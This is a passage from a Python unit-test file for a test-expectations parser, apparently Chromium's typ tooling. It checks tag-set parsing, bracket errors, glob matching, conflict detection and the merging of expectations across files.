expectations_parser.Expectation(None, 'b1/s1', [], ['SKIP'], 3),
]
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcome[i])
def testParseExpectationLineMultipleTags(self):
raw_data = ('# tags: [ All None batman ]\n'
'# results: [ Skip Pass Failure ]\n'
'crbug.com/123 [ all ] b1/s1 [ Skip ]\n'
'crbug.com/124 [ None ] b1/s2 [ Pass ]\n'
'crbug.com/125 [ Batman ] b1/s3 [ Failure ]')
parser = expectations_parser.TaggedTestListParser(raw_data)
expected_outcome = [
expectations_parser.Expectation(
'crbug.com/123', 'b1/s1', ['all'], ['SKIP'], 3),
expectations_parser.Expectation(
'crbug.com/124', 'b1/s2', ['none'], ['PASS'], 4),
expectations_parser.Expectation(
'crbug.com/125', 'b1/s3', ['batman'], ['FAIL'], 5)
]
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcome[i])
def testParseExpectationLineBadTagBracket(self):
raw_data = '# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/23456 ] Mac ] b1/s2 [ Skip ]'
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseExpectationLineBadResultBracket(self):
raw_data = '# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/23456 ] Mac ] b1/s2 ] Skip ]'
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseExpectationLineBadTagBracketSpacing(self):
raw_data = '# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/2345 [Mac] b1/s1 [ Skip ]'
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseExpectationLineBadResultBracketSpacing(self):
raw_data = '# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/2345 [ Mac ] b1/s1 [Skip]'
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseExpectationLineNoClosingTagBracket(self):
raw_data = '# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/2345 [ Mac b1/s1 [ Skip ]'
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseExpectationLineNoClosingResultBracket(self):
raw_data = '# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/2345 [ Mac ] b1/s1 [ Skip'
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseExpectationLineUrlInTestName(self):
raw_data = (
'# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/123 [ Mac ] b.1/http://google.com [ Skip ]'
)
expected_outcomes = [
expectations_parser.Expectation(
'crbug.com/123', 'b.1/http://google.com', ['mac'], ['SKIP'], 3)
]
parser = expectations_parser.TaggedTestListParser(raw_data)
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcomes[i])
def testParseExpectationSpaceEscapeInTestName(self):
raw_data = (
'# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/123 [ Mac ] http://google.com/Foo%20Bar [ Skip ]'
)
expected_outcomes = [
expectations_parser.Expectation(
'crbug.com/123', 'http://google.com/Foo Bar', ['mac'], ['SKIP'], 3)
]
parser = expectations_parser.TaggedTestListParser(raw_data)
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcomes[i])
def testParseExpectationPercentEscapeInTestName(self):
raw_data = (
'# tags: [ Mac ]\n# results: [ Skip ]\ncrbug.com/123 [ Mac ] http://google.com/Foo%2520Bar [ Skip ]'
)
expected_outcomes = [
expectations_parser.Expectation(
'crbug.com/123', 'http://google.com/Foo%20Bar', ['mac'], ['SKIP'], 3)
]
parser = expectations_parser.TaggedTestListParser(raw_data)
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcomes[i])
def testParseExpectationLineEndingComment(self):
raw_data = ('# tags: [ Mac ]\n# results: [ Skip ]\n'
'crbug.com/23456 [ Mac ] b1/s2 [ Skip ] # abc 123')
parser = expectations_parser.TaggedTestListParser(raw_data)
expected_outcome = [
expectations_parser.Expectation('crbug.com/23456', 'b1/s2',
['mac'], ['SKIP'], 3,
trailing_comments=' # abc 123')
]
for i in range(len(parser.expectations)):
self.assertEqual(parser.expectations[i], expected_outcome[i])
def testSingleLineTagAfterMultiLineTagWorks(self):
expectations_file = """
# This is a test expectation file.
#
# tags: [ tag1 tag2
# tag3 tag5
# tag6
# ]
# tags: [ tag4 ]
# results: [ Skip ]
crbug.com/12345 [ tag3 tag4 ] b1/s1 [ Skip ]
"""
expectations_parser.TaggedTestListParser(expectations_file)
def testParseBadMultiline_1(self):
raw_data = ('# tags: [ Mac\n'
' Win\n'
'# ]\n# results: [ skip ]\n'
'crbug.com/23456 [ Mac ] b1/s2 [ SKip ]')
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseTwoSetsOfTagsOnOneLineAreNotAllowed(self):
raw_data = ('# tags: [ Debug ] [ Release ]\n')
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseTrailingTextAfterTagSetIsNotAllowed(self):
raw_data = ('# tags: [ Debug\n'
'# ] # Release\n')
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseBadMultiline_2(self):
raw_data = ('# tags: [ Mac\n'
' Win ]\n'
'crbug.com/23456 [ Mac ] b1/s2 [ Skip ]')
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testParseUnknownResult(self):
raw_data = ('# tags: [ Mac ]\n'
'crbug.com/23456 [ Mac ] b1/s2 [ UnknownResult ]')
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testOneTagInMultipleTagsets(self):
raw_data = ('# tags: [ Mac Win Linux ]\n'
'# tags: [ Mac BMW ]')
with self.assertRaises(expectations_parser.ParseError) as context:
expectations_parser.TaggedTestListParser(raw_data)
self.assertEqual(
'1: The tag mac was found in multiple tag sets',
str(context.exception))
def testTwoTagsinMultipleTagsets(self):
raw_data = ('\n# tags: [ Mac Linux ]\n# tags: [ Mac BMW Win ]\n'
'# tags: [ Win Android ]\n# tags: [ iOS ]')
with self.assertRaises(expectations_parser.ParseError) as context:
expectations_parser.TaggedTestListParser(raw_data)
self.assertEqual(
'2: The tags mac and win were found in multiple tag sets',
str(context.exception))
def testTwoPlusTagsinMultipleTagsets(self):
raw_data = ('\n\n# tags: [ Mac Linux ]\n# tags: [ Mac BMW Win ]\n'
'# tags: [ Win Android ]\n# tags: [ IOS bmw ]')
with self.assertRaises(expectations_parser.ParseError) as context:
expectations_parser.TaggedTestListParser(raw_data)
self.assertEqual(
'3: The tags bmw, mac and win'
' were found in multiple tag sets',
str(context.exception))
def testTwoTagsetPairsSharingTags(self):
raw_data = ('\n\n\n# tags: [ Mac Linux Win ]\n# tags: [ mac BMW Win ]\n'
'# tags: [ android ]\n# tags: [ IOS Android ]')
with self.assertRaises(expectations_parser.ParseError) as context:
expectations_parser.TaggedTestListParser(raw_data)
self.assertEqual(
'4: The tags android, mac and win'
' were found in multiple tag sets',
str(context.exception))
def testDisjointTagsets(self):
raw_data = ('# tags: [ Mac Win Linux ]\n'
'# tags: [ Honda BMW ]')
expectations_parser.TaggedTestListParser(raw_data)
def testEachTagInGroupIsNotFromDisjointTagSets(self):
raw_data = (
'# tags: [ Mac Win Amd Intel]\n'
'# tags: [Linux Batman Robin Superman]\n'
'# results: [ Pass ]\n'
'crbug.com/23456 [ mac Win Amd robin Linux ] b1/s1 [ Pass ]\n')
with self.assertRaises(expectations_parser.ParseError) as context:
expectations_parser.TaggedTestListParser(raw_data)
self.assertIn(
'4: The tag group contains tags '
'that are part of the same tag set\n',
str(context.exception))
self.assertIn(' - Tags linux and robin are part of the same tag set',
str(context.exception))
self.assertIn(' - Tags amd, mac and win are part of the same tag set',
str(context.exception))
self.assertNotIn(' - Tags webgl-version-1', str(context.exception))
def testEachTagInGroupIsFromDisjointTagSets(self):
raw_data = (
'# tags: [ Mac Win Linux ]\n'
'# tags: [ Batman Robin Superman ]\n'
'# tags: [ Android Iphone ]\n'
'# results: [ Failure Pass Skip ]\n'
'crbug.com/23456 [ android Mac Superman ] b1/s1 [ Failure ]\n'
'crbug.com/23457 [ Iphone win Robin ] b1/s2 [ Pass ]\n'
'crbug.com/23458 [ Android linux ] b1/s3 [ Pass ]\n'
'crbug.com/23459 [ Batman ] b1/s4 [ Skip ]\n')
expectations_parser.TaggedTestListParser(raw_data)
def testDuplicateTagsInGroupRaisesError(self):
raw_data = (
'# tags: [ Mac Win Linux ]\n'
'# tags: [ Batman Robin Superman ]\n'
'# results: [ Failure ]\n'
'crbug.com/23456 [ Batman Batman Batman ] b1/s1 [ Failure ]\n')
with self.assertRaises(expectations_parser.ParseError) as context:
expectations_parser.TaggedTestListParser(raw_data)
self.assertIn('4: The tag group contains '
'tags that are part of the same tag set\n',
str(context.exception))
self.assertIn(' - Tags batman, batman and batman are'
' part of the same tag set', str(context.exception))
def testRetryOnFailureExpectation(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ RetryOnFailure ]\n'
'crbug.com/23456 [ linux ] b1/s1 [ RetryOnFailure ]\n')
parser = expectations_parser.TaggedTestListParser(raw_data)
exp = parser.expectations[0]
self.assertEqual(exp.should_retry_on_failure, True)
def testDefaultPass(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ Failure ]\n'
'crbug.com/23456 [ linux ] b1/s1 [ Failure ]\n')
expectations = expectations_parser.TestExpectations(tags=['linux'])
expectations.parse_tagged_list(raw_data)
exp = expectations.expectations_for('b1/s1')
self.assertEqual(exp.results, set([ResultType.Failure]))
self.assertFalse(exp.is_default_pass)
self.assertFalse(exp.is_slow_test)
exp = expectations.expectations_for('b1/s2')
self.assertEqual(exp.results, set([ResultType.Pass]))
self.assertTrue(exp.is_default_pass)
self.assertFalse(exp.is_slow_test)
def testSlowDefaultPassAndFailure(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ Failure Slow ]\n'
'crbug.com/23456 [ Linux ] b1/s1 [ Failure ]\n'
'crbug.com/23456 b1/s1 [ Slow ]\n')
expectations = expectations_parser.TestExpectations(tags=['linux'])
expectations.parse_tagged_list(raw_data)
exp = expectations.expectations_for('b1/s1')
self.assertEqual(exp.results, set([ResultType.Failure]))
self.assertFalse(exp.is_default_pass)
self.assertTrue(exp.is_slow_test)
expectations = expectations_parser.TestExpectations(tags=['win'])
expectations.parse_tagged_list(raw_data)
exp = expectations.expectations_for('b1/s1')
self.assertEqual(exp.results, set([ResultType.Pass]))
self.assertTrue(exp.is_default_pass)
self.assertTrue(exp.is_slow_test)
def testRetryOnFailureDefaultPassAndFailure(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ Failure RetryOnFailure ]\n'
'crbug.com/23456 [ Linux ] b1/s1 [ Failure ]\n'
'crbug.com/23456 b1/s1 [ RetryOnFailure ]\n')
expectations = expectations_parser.TestExpectations(tags=['linux'])
expectations.parse_tagged_list(raw_data)
exp = expectations.expectations_for('b1/s1')
self.assertEqual(exp.results, set([ResultType.Failure]))
self.assertFalse(exp.is_default_pass)
self.assertTrue(exp.should_retry_on_failure)
expectations = expectations_parser.TestExpectations(tags=['win'])
expectations.parse_tagged_list(raw_data)
exp = expectations.expectations_for('b1/s1')
self.assertEqual(exp.results, set([ResultType.Pass]))
self.assertTrue(exp.is_default_pass)
self.assertTrue(exp.should_retry_on_failure)
def testGetExpectationsFromGlob(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ Failure ]\n'
'crbug.com/23456 [ linux ] b1/s1* [ Failure ]\n')
expectations = expectations_parser.TestExpectations(tags=['linux'])
expectations.parse_tagged_list(raw_data)
exp = expectations.expectations_for('b1/s1')
self.assertEqual(exp.results, set([ResultType.Failure]))
def testGetExpectationsFromGlobShorterThanLongestMatchingGlob(self):
raw_data = (
'# tags: [ Linux Mac ]\n'
'# results: [ Failure Pass ]\n'
'crbug.com/23456 [ linux ] b1/s1* [ Failure ]\n'
'crbug.com/23456 [ mac ] b1/* [ Pass ]\n')
expectations = expectations_parser.TestExpectations(tags=['mac'])
expectations.parse_tagged_list(raw_data)
exp = expectations.expectations_for('b1/s1')
self.assertEqual(exp.results, set([ResultType.Pass]))
def testIsTestRetryOnFailure(self):
raw_data = (
'# tags: [ linux ]\n'
'# results: [ Failure RetryOnFailure ]\n'
'# conflicts_allowed: true\n'
'crbug.com/23456 [ Linux ] b1/s1 [ Failure ]\n'
'crbug.com/23456 [ Linux ] b1/s1 [ RetryOnFailure ]\n'
'[ linux ] b1/s2 [ RetryOnFailure ]\n'
'crbug.com/24341 [ Linux ] b1/s3 [ Failure ]\n')
test_expectations = expectations_parser.TestExpectations(['Linux'])
self.assertEqual(
test_expectations.parse_tagged_list(raw_data, 'test.txt'), (0,''))
self.assertEqual(test_expectations.expectations_for('b1/s1'),
Expectation(
test='b1/s1', results={ResultType.Failure}, retry_on_failure=True,
is_slow_test=False, reason='crbug.com/23456',
tags={'linux'}))
self.assertEqual(test_expectations.expectations_for('b1/s2'),
Expectation(
test='b1/s2', results={ResultType.Pass}, retry_on_failure=True,
is_slow_test=False, tags={'linux'}))
self.assertEqual(test_expectations.expectations_for('b1/s3'),
Expectation(
test='b1/s3', results={ResultType.Failure}, retry_on_failure=False,
is_slow_test=False, reason='crbug.com/24341', tags={'linux'}))
self.assertEqual(test_expectations.expectations_for('b1/s4'),
Expectation(
test='b1/s4', results={ResultType.Pass}, retry_on_failure=False,
is_slow_test=False))
def testMergeExpectationsUsingUnionResolution(self):
raw_data1 = (
'# tags: [ linux ]\n'
'# results: [ Failure RetryOnFailure Slow ]\n'
'[ linux ] b1/s3 [ Failure ]\n'
'crbug.com/2431 [ linux ] b1/s2 [ Failure RetryOnFailure ] # c1\n'
'crbug.com/2432 [ linux ] b1/s* [ Failure Slow ]\n')
raw_data2 = (
'# tags: [ Intel ]\n'
'# results: [ Pass RetryOnFailure ]\n'
'[ intel ] b1/s1 [ RetryOnFailure ]\n'
'crbug.com/2432 [ intel ] b1/s2 [ Pass ] # c2\n'
'crbug.com/2431 [ intel ] b1/s* [ RetryOnFailure ]\n')
test_exp1 = expectations_parser.TestExpectations(['Linux'])
ret, _ = test_exp1.parse_tagged_list(raw_data1)
self.assertEqual(ret, 0)
test_exp2 = expectations_parser.TestExpectations(['Intel'])
ret, _ = test_exp2.parse_tagged_list(raw_data2)
self.assertEqual(ret, 0)
test_exp1.merge_test_expectations(test_exp2)
self.assertEqual(sorted(test_exp1.tags), ['intel', 'linux'])
self.assertEqual(test_exp1.expectations_for('b1/s2'),
Expectation(
test='b1/s2',
results={ResultType.Pass, ResultType.Failure},
retry_on_failure=True, is_slow_test=False,
reason='crbug.com/2431 crbug.com/2432',
trailing_comments=' # c1\n # c2\n',
tags={'linux', 'intel'}))
self.assertEqual(test_exp1.expectations_for('b1/s1'),
Expectation(
test='b1/s1', results={ResultType.Pass},
retry_on_failure=True, is_slow_test=False,
tags={'intel'}))
self.assertEqual(test_exp1.expectations_for('b1/s3'),
Expectation(
test='b1/s3', results={ResultType.Failure},
retry_on_failure=False, is_slow_test=False,
tags={'linux'}))
self.assertEqual(test_exp1.expectations_for('b1/s5'),
Expectation(
test='b1/s5', results={ResultType.Failure},
retry_on_failure=True, is_slow_test=True,
reason='crbug.com/2431 crbug.com/2432',
tags={'linux', 'intel'}))
def testResolutionReturnedFromExpectationsFor(self):
raw_data1 = (
'# tags: [ linux ]\n'
'# results: [ Failure RetryOnFailure Slow ]\n'
'[ linux ] b1/s3 [ Failure ]\n'
'crbug.com/2431 [ linux ] b1/s2 [ Failure RetryOnFailure ]\n'
'crbug.com/2432 [ linux ] b1/s* [ Failure ]\n')
raw_data2 = (
'# tags: [ Intel ]\n'
'# results: [ Pass RetryOnFailure Slow ]\n'
'[ intel ] b1/s1 [ RetryOnFailure ]\n'
'crbug.com/2432 [ intel ] b1/s2 [ Pass Slow ]\n'
'crbug.com/2431 [ intel ] b1/s* [ RetryOnFailure ]\n')
raw_data3 = (
'# tags: [ linux ]\n'
'# results: [ Failure RetryOnFailure Slow ]\n'
'# conflict_resolution: OVERRIDE\n'
'[ linux ] b1/s3 [ Failure ]\n'
'crbug.com/2431 [ linux ] b1/s2 [ Failure RetryOnFailure ]\n'
'crbug.com/2432 [ linux ] b1/s* [ Failure ]\n')
test_exp1 = expectations_parser.TestExpectations(['Linux'])
ret, _ = test_exp1.parse_tagged_list(raw_data1)
self.assertEqual(ret, 0)
self.assertEqual(test_exp1.expectations_for('b1/s2'),
Expectation(
test='b1/s2', results={ResultType.Failure},
retry_on_failure=True, is_slow_test=False,
reason='crbug.com/2431', tags={'linux'},
conflict_resolution=ConflictResolutionTypes.UNION
))
test_exp2 = expectations_parser.TestExpectations(['Intel'])
ret, _ = test_exp2.parse_tagged_list(
raw_data2,
conflict_resolution = ConflictResolutionTypes.OVERRIDE)
self.assertEqual(ret, 0)
self.assertEqual(test_exp2.expectations_for('b1/s2'),
Expectation(
test='b1/s2', results={ResultType.Pass},
retry_on_failure=False, is_slow_test=True,
reason='crbug.com/2432', tags={'intel'},
conflict_resolution=ConflictResolutionTypes.OVERRIDE
))
test_exp3 = expectations_parser.TestExpectations(['Linux'])
ret, _ = test_exp3.parse_tagged_list(raw_data3)
self.assertEqual(ret, 0)
self.assertEqual(test_exp3.expectations_for('b1/s2'),
Expectation(
test='b1/s2', results={ResultType.Failure},
retry_on_failure=True, is_slow_test=False,
reason='crbug.com/2431', tags={'linux'},
conflict_resolution=ConflictResolutionTypes.OVERRIDE
))
def testMergeExpectationsUsingOverrideResolution(self):
raw_data1 = (
'# tags: [ linux ]\n'
'# results: [ Failure RetryOnFailure Slow ]\n'
'[ linux ] b1/s3 [ Failure ]\n'
'crbug.com/2431 [ linux ] b1/s2 [ Failure RetryOnFailure ]\n'
'crbug.com/2432 [ linux ] b1/s* [ Failure ]\n')
raw_data2 = (
'# tags: [ Intel ]\n'
'# results: [ Pass RetryOnFailure Slow ]\n'
'[ intel ] b1/s1 [ RetryOnFailure ]\n'
'crbug.com/2432 [ intel ] b1/s2 [ Pass Slow ]\n'
'crbug.com/2431 [ intel ] b1/s* [ RetryOnFailure ]\n')
test_exp1 = expectations_parser.TestExpectations(['Linux'])
ret, _ = test_exp1.parse_tagged_list(raw_data1)
self.assertEqual(ret, 0)
test_exp2 = expectations_parser.TestExpectations(['Intel'])
ret, _ = test_exp2.parse_tagged_list(
raw_data2, conflict_resolution=ConflictResolutionTypes.OVERRIDE)
self.assertEqual(ret, 0)
test_exp1.merge_test_expectations(test_exp2)
self.assertEqual(sorted(test_exp1.tags), ['intel', 'linux'])
self.assertEqual(test_exp1.expectations_for('b1/s2'),
Expectation(
test='b1/s2', results={ResultType.Pass},
retry_on_failure=False, is_slow_test=True,
reason='crbug.com/2432', tags={'intel'}))
self.assertEqual(test_exp1.expectations_for('b1/s1'),
Expectation(test='b1/s1', results={ResultType.Pass},
retry_on_failure=True, is_slow_test=False,
tags={'intel'}))
self.assertEqual(test_exp1.expectations_for('b1/s3'),
Expectation(test='b1/s3', results={ResultType.Failure},
retry_on_failure=False, is_slow_test=False,
tags={'linux'}))
self.assertEqual(test_exp1.expectations_for('b1/s5'),
Expectation(test='b1/s5', results={ResultType.Pass},
retry_on_failure=True, is_slow_test=False,
reason='crbug.com/2431',
tags={'intel'}))
def testIsNotTestRetryOnFailureUsingEscapedGlob(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ RetryOnFailure ]\n'
'crbug.com/23456 [ Linux ] b1/\* [ RetryOnFailure ]\n')
test_expectations = expectations_parser.TestExpectations(['Linux'])
self.assertEqual(
test_expectations.parse_tagged_list(raw_data, 'test.txt'),
(0, ''))
self.assertIn('b1/*', test_expectations.individual_exps)
self.assertEqual(test_expectations.expectations_for('b1/s1'),
Expectation(test='b1/s1', results={ResultType.Pass},
retry_on_failure=False, is_slow_test=False))
def testIsTestRetryOnFailureUsingGlob(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ RetryOnFailure ]\n'
'crbug.com/23456 [ Linux ] b1/* [ RetryOnFailure ]\n')
test_expectations = expectations_parser.TestExpectations(['Linux'])
self.assertEqual(
test_expectations.parse_tagged_list(raw_data, 'test.txt'),
(0, ''))
self.assertEqual(test_expectations.expectations_for('b1/s1'),
Expectation(test='b1/s1', results={ResultType.Pass},
retry_on_failure=True, is_slow_test=False,
reason='crbug.com/23456', tags={'linux'}))
def testGlobsCanExistInMiddleofPatternUsingEscapeCharacter(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ RetryOnFailure ]\n'
'crbug.com/23456 [ Linux ] b1/\*/c [ RetryOnFailure ]\n')
expectations_parser.TaggedTestListParser(raw_data)
def testGlobsCanOnlyHaveStarInEnd(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ RetryOnFailure ]\n'
'crbug.com/23456 [ Linux ] b1/*/c [ RetryOnFailure ]\n')
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testGlobsCanOnlyHaveStarInEnd1(self):
raw_data = (
'# tags: [ Linux ]\n'
'# results: [ RetryOnFailure ]\n'
'crbug.com/23456 [ Linux ] */c [ RetryOnFailure ]\n')
with self.assertRaises(expectations_parser.ParseError):
expectations_parser.TaggedTestListParser(raw_data)
def testUseIncorrectvalueForConflictsAllowedDescriptor(self):
test_expectations = '''# tags: [ mac win linux ]
# tags: [ intel amd nvidia ]
# tags: [ debug release ]
# results: [ Failure Skip ]
# conflicts_allowed: Unknown
'''
expectations = expectations_parser.TestExpectations()
_, msg = expectations.parse_tagged_list(test_expectations, 'test.txt')
self.assertEqual("5: Unrecognized value 'unknown' "
"given for conflicts_allowed descriptor", msg)
def testConflictsInTestExpectation(self):
expectations = expectations_parser.TestExpectations()
_, errors = expectations.parse_tagged_list(
'# tags: [ mac win linux ]\n'
'# tags: [ intel amd nvidia ]\n'
'# tags: [ debug release ]\n'
'# conflicts_allowed: False\n'
'# results: [ Failure Skip RetryOnFailure ]\n'
'[ intel win ] a/b/c/* [ Failure ]\n'
'[ intel win debug ] a/b/c/* [ Skip ]\n'
'[ intel ] a/b/c/* [ Failure ]\n'
'[ amd mac ] a/b [ RetryOnFailure ]\n'
'[ mac ] a/b [ Skip ]\n'
'[ amd mac ] a/b/c [ Failure ]\n'
'[ intel mac ] a/b/c [ Failure ]\n', 'test.txt')
self.assertIn("Found conflicts for pattern a/b/c/* in test.txt:",
errors)
self.assertIn('line 6 conflicts with line 7', errors)
self.assertIn('line 6 conflicts with line 8', errors)
self.assertIn('line 7 conflicts with line 8', errors)
self.assertIn("Found conflicts for pattern a/b in test.txt:", errors)
self.assertIn('line 9 conflicts with line 10', errors)
self.assertNotIn("Found conflicts for pattern a/b/c in test.txt:",
errors)
def testFileNameExcludedFromErrorMessageForExpectationConflicts(self):
test_expectations = '''# tags: [ mac ]
# tags: [ intel ]
# results: [ Failure ]
[ intel ] a/b/c/d [ Failure ]
[ mac ] a/b/c/d [ Failure ]
'''
expectations = expectations_parser.TestExpectations()
_, errors = expectations.parse_tagged_list(test_expectations)
self.assertIn("Found conflicts for pattern a/b/c/d:", errors)
def testConflictsUsingUserDefinedTagsConflictFunction(self):
test_expectations = '''# tags: [ win win7 ]
# results: [ Failure ]
[ win ] a/b/c/d [ Failure ]
[ win7 ] a/b/c/d [ Failure ]
'''
map_child_tag_to_parent_tag = {'win7': 'win'}
tags_conflict = lambda t1, t2: (
t1 != t2 and t1 != map_child_tag_to_parent_tag.get(t2,t2) and
t2 != map_child_tag_to_parent_tag.get(t1,t1))
expectations = expectations_parser.TestExpectations()
_, errors = expectations.parse_tagged_list(
test_expectations, tags_conflict=tags_conflict)
self.assertIn("Found conflicts for pattern a/b/c/d:", errors)
def testNoCollisionInTestExpectations(self):
test_expectations = '''# tags: [ mac win linux ]
# tags: [ intel amd nvidia ]
# tags: [ debug release ]
# results: [ Failure ]
# conflicts_allowed: False
[ intel debug ] a/b/c/d [ Failure ]
[ nvidia debug ] a/b/c/d [ Failure ]
'''
expectations = expectations_parser.TestExpectations()
_, errors = expectations.parse_tagged_list(
test_expectations, 'test.txt')
self.assertFalse(errors)
def testConflictsAllowedIsSetToTrue(self):
test_expectations = '''# tags: [ mac win linux ]
# tags: [ intel amd nvidia ]
# tags: [ debug release ]
# results: [ Failure ]
# conflicts_allowed: True
[ intel debug ] a/b/c/d [ Failure ]
[ intel ] a/b/c/d [ Failure ]
'''
expectations = expectations_parser.TestExpectations()
_, msg = expectations.parse_tagged_list(
test_expectations, 'test.txt')
self.assertFalse(msg)
def testConflictFoundRegardlessOfTagCase(self):
test_expectations = '''# tags: [ InTel AMD nvidia ]
# results: [ Failure ]
[ intel ] a/b/c/d [ Failure ]
[ Intel ] a/b/c/d [ Failure ]
'''
expectations = expectations_parser.TestExpectations()
ret, msg = expectations.parse_tagged_list(
test_expectations, 'test.txt')
self.assertTrue(ret)
self.assertIn('Found conflicts for pattern a/b/c/d', msg)
def testConflictNotFoundRegardlessOfTagCase(self):
test_expectations = '''# tags: [ InTel AMD nvidia ]
# results: [ Failure ]
[ intel ] a/b/c/d [ Failure ]
[ amd ] a/b/c/d [ Failure ]
'''
expectations = expectations_parser.TestExpectations()
_, msg = expectations.parse_tagged_list(
test_expectations, 'test.txt')
self.assertFalse(msg)
def testExpectationPatternIsBroken(self):
test_expectations = '# results: [ Failure ]\na/\* [ Failure ]'
expectations = expectations_parser.TestExpectations()
expectations.parse_tagged_list(test_expectations, 'test.txt')
broken_expectations = expectations.check_for_broken_expectations(
['a/b/c'])
self.assertEqual(broken_expectations[0].test, 'a/*')
def testExpectationPatternIsNotBroken(self):
test_expectations = '# results: [ Failure ]\na/b/d [ Failure ]'
expectations = expectations_parser.TestExpectations()
expectations.parse_tagged_list(test_expectations, 'test.txt')
broken_expectations = expectations.check_for_broken_expectations(
['a/b/c'])
self.assertEqual(broken_expectations[0].test, 'a/b/d')
def testExpectationWithGlobIsBroken(self):
test_expectations = '# results: [ Failure ]\na/b/d* [ Failure ]'
expectations = expectations_parser.TestExpectations()
expectations.parse_tagged_list(test_expectations, 'test.txt')
broken_expectations = expectations.check_for_broken_expectations(
['a/b/c/d', 'a/b', 'a/b/c'])
self.assertEqual(broken_expectations[0].test, 'a/b/d*')
def testExpectationWithGlobIsNotBroken(self):
test_expectations = '# results: [ Failure ]\na/b* [ Failure ]'
expectations = expectations_parser.TestExpectations()
expectations.parse_tagged_list(test_expectations, 'test.txt')
broken_expectations = expectations.check_for_broken_expectations(
['a/b'])
self.assertFalse(broken_expectations)
def testNonDeclaredSystemConditionTagRaisesException(self):
test_expectations = '''# tags: [ InTel AMD nvidia ]
# tags: [ win ]
# results: [ Failure ]
'''
expectations = expectations_parser.TestExpectations()
_, msg = expectations.parse_tagged_list(
test_expectations, 'test.txt')
self.assertFalse(msg)
with self.assertRaises(ValueError) as context:
expectations.set_tags(['Unknown'], raise_ex_for_bad_tags=True)
self.assertEqual(str(context.exception),
'Tag unknown is not declared in the expectations file and has not '
'been explicitly ignored by the test. There may have been a typo '
'in the expectations file. Please make sure the aforementioned tag '
'is declared at the top of the expectations file.')
def testNonDeclaredSystemConditionTagsRaisesException_PluralCase(self):
test_expectations = '''# tags: [ InTel AMD nvidia ]
# tags: [ win ]
# results: [ Failure ]
'''
expectations = expectations_parser.TestExpectations()
_, msg = expectations.parse_tagged_list(
test_expectations, 'test.txt')
self.assertFalse(msg)
with self.assertRaises(ValueError) as context:
expectations.set_tags(['Unknown', 'linux', 'nVidia', 'nvidia-0x1010'],
raise_ex_for_bad_tags=True)
self.assertEqual(str(context.exception),
'Tags linux, nvidia-0x1010 and unknown are not declared in the '
'expectations file and have not been explicitly ignored by the '
'test. There may have been a typo in the expectations file. Please '
'make sure the aforementioned tags are declared at the top of the '
'expectations file.')
def testIgnoredTags(self):
test_expectations = """# tags: [ foo ]
# results: [ Failure ]
"""
expectations = expectations_parser.TestExpectations(
ignored_tags=['ignored'])
_, msg = expectations.parse_tagged_list(test_expectations, 'test.txt')
self.assertFalse(msg)
expectations.set_tags(['ignored'], raise_ex_for_bad_tags=True)
def testDeclaredSystemConditionTagsDontRaiseAnException(self):
test_expectations = '''# tags: [ InTel AMD nvidia nvidia-0x1010 ]
# tags: [ win ]
# results: [ Failure ]
'''
expectations = expectations_parser.TestExpectations()
_, msg = expectations.parse_tagged_list(
test_expectations, 'test.txt')
self.assertFalse(msg)
expectations.set_tags(['win', 'nVidia', 'nvidia-0x1010'],
raise_ex_for_bad_tags=True)
def testMultipleReasonsForExpectation(self):
test_expectations = '''# results: [ Failure ]
skbug.com/111 crbug.com/wpt/222 skbug.com/hello/333 crbug.com/444 test [ Failure ]
'''
expectations = expectations_parser.TestExpectations()
_, msg = expectations.parse_tagged_list(
test_expectations, 'test.txt')
self.assertFalse(msg)
exp = expectations.expectations_for('test')
self.assertEqual(exp.reason, 'skbug.com/111 crbug.com/wpt/222 skbug.com/hello/333 crbug.com/444')
def testExpectationToString(self):
exp = Expectation(reason='crbug.com/123', test='test.html?*', tags=['intel'],
results={ResultType.Pass, ResultType.Failure}, is_slow_test=True,
retry_on_failure=True)
self.assertEqual(
exp.to_string(), 'crbug.com/123 [ Intel ] test.html?\* [ Failure Pass RetryOnFailure Slow ]')
def testExpectationWithSpaceInTestNameToString(self):
exp = Expectation(reason='crbug.com/123', test='test.html?Foo Bar', tags=['intel'],
results={ResultType.Pass, ResultType.Failure}, is_slow_test=False,
retry_on_failure=False)
self.assertEqual(
